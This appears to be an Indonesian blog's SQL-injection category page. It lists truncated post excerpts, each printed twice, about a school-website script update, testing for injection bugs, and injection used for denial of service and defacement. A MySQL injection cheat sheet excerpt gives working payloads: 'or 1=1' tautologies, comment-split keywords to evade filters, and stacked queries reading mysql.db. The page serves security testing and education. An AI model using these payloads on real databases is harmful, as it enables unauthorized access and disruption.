News
Sql Injection
Update terbaru website sekolah versi 2017 telah tersedia
Sabtu, 2 September 2017
Dalam rangka menjamin keamanan website dari serangan hacker maka kini telah tersedia update script website sekolah versi 2017, serta memperbaiki beberapa bug dan juga ada penambahan fitur terbaru yakni file menejer dimana administrator dapat mengupload file berformat .docx, .xlsx, .pptx, .zip, .pdf dan lain sebagainya. Demo : http://sekolah.klatenweb.com Bagi konsumen yang sudah membeli script website sekolah versi 2017 ini maka akan diberikan full script beserta tambahan da...
Dalam rangka menjamin keamanan website dari serangan hacker maka kini telah tersedia update script website sekolah versi 2017, serta memperbaiki beberapa bug dan juga ada penambahan fitur terbaru yakni file menejer dimana administrator dapat mengupload file berformat .docx, .xlsx, .pptx, .zip, .pdf dan lain sebagainya. Demo : http://sekolah.klatenweb.com Bagi konsumen yang sudah membeli script website sekolah versi 2017 ini maka akan diberikan full script beserta tambahan da...
How to Test for SQL Injection Bugs
Rabu, 22 Juni 2011
Below is a summary of steps needed for testing for SQL injection bugs Step 1: Understand SQL injection attack scenarios Step 2: List high risk components and entry points Step 3: Start testing and exploring Step 4: Tune of test data Step 4: Tune test cases data At this point you have started executing an exploratory pass through the input variables. During step 4 you need to concentrate on covering all entry points of each variab...
Below is a summary of steps needed for testing for SQL injection bugs Step 1: Understand SQL injection attack scenarios Step 2: List high risk components and entry points Step 3: Start testing and exploring Step 4: Tune of test data Step 4: Tune test cases data At this point you have started executing an exploratory pass through the input variables. During step 4 you need to concentrate on covering all entry points of each variab...
MySQL Injection Cheat Sheet
Selasa, 21 Juni 2011
MySQL Injection Cheat Sheet Basics. SELECT * FROM login /* foobar */SELECT * FROM login WHERE id = 1 or 1=1SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"Variations. SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%" SHOW TABLESSELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLESSELECT VERSIONSELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()SELECT host,user,db from mysql.dbSELECT...
MySQL Injection Cheat Sheet Basics. SELECT * FROM login /* foobar */SELECT * FROM login WHERE id = 1 or 1=1SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"Variations. SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%" SHOW TABLESSELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLESSELECT VERSIONSELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()SELECT host,user,db from mysql.dbSELECT...
SQL Injection for DoS
Minggu, 22 Mei 2011
Another application threat related to SQL injection is Denial of Service (DoS), which, in its most extreme form, can bring the Web application to a halt by shutting down its backend database. It takes place when an attacker appends the SHUTDOWN command to a SQL statement, or when the attacker creates complex queries over self-joins of large database tables with the intention of sending the database into time consuming loops over lots of data. This ends up consuming pre...
Another application threat related to SQL injection is Denial of Service (DoS), which, in its most extreme form, can bring the Web application to a halt by shutting down its backend database. It takes place when an attacker appends the SHUTDOWN command to a SQL statement, or when the attacker creates complex queries over self-joins of large database tables with the intention of sending the database into time consuming loops over lots of data. This ends up consuming pre...
SQL Injection for Web site defacement
Minggu, 22 Mei 2011
Web site defacement traditionally occurred when a hacker obtained administrative privileges to a Web site and then altered the content of the Web site with potentially offensive or erroneous graphics and text. While Web site owners have bolstered the security of Web configuration tools, malicious users have discovered a new technique to deface Web sites: SQL injection. In 2007, there were several high profile incidents in which SQL injection was used for Web site defacement. ...
Web site defacement traditionally occurred when a hacker obtained administrative privileges to a Web site and then altered the content of the Web site with potentially offensive or erroneous graphics and text. While Web site owners have bolstered the security of Web configuration tools, malicious users have discovered a new technique to deface Web sites: SQL injection. In 2007, there were several high profile incidents in which SQL injection was used for Web site defacement. ...
Message Me On Whatsapp